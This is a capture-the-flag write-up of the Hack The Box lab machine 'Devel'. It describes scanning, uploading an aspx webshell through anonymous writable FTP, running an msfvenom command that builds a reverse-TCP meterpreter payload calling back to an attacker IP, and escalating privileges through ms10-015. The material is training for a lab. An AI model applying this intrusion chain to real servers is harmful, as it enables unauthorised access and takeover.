Hack The Box —— Devel

信息搜集

nmap

1

nmap -T4 -A -v 10.10.10.5

It was found that the server had port 21 and port 80, and the ftp service could be accessed anonymously, but the version number was not known. The browser accesses the http service and finds that there is only the default page of iis.

目录扫描

Use the dirsearch tool to scan a wave of directories:

1

python3 dirsearch -u http://10.10.10.5 -e html

No special discovery was made.

FTP

Anonymously accessed the FTP service and found that there is write permission in the current directory, so I want to obtain the permissions of the server by uploading the webshell.

漏洞利用

webshell

First upload the webshell of aspx:

When you access the browser, you find that the webshell has no error and can be executed.

Link with ant sword :

When accessing some directories, I found that the permissions were insufficient.

Using the virtual terminal of the Ant Sword, I executed whoami and found that there was only the permissions of iis user, so I found a way to increase the power.

权限提升

Use msfvenom to generate an exe Trojan file, and use msf to receive the back-connected shell to facilitate the raising of rights.

1

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f exe shell.exe

The generated shell.exe file is then uploaded to the target server through the Ant Sword and executed through the virtual terminal.

Use msf to listen to the port and receive the connected shell :

Use the detection script that comes with msf to view vulnerabilities that may be used to escalate rights:

After testing one by one: it was found that ms10-015 can be used to increase power.

A new session was successfully created.

Execute the getuid command under meterpreter:

Discovered successfully raising power.

Next, you can get the flag in type c:\users\Administrator\Desktop\root.txt.txt.txt.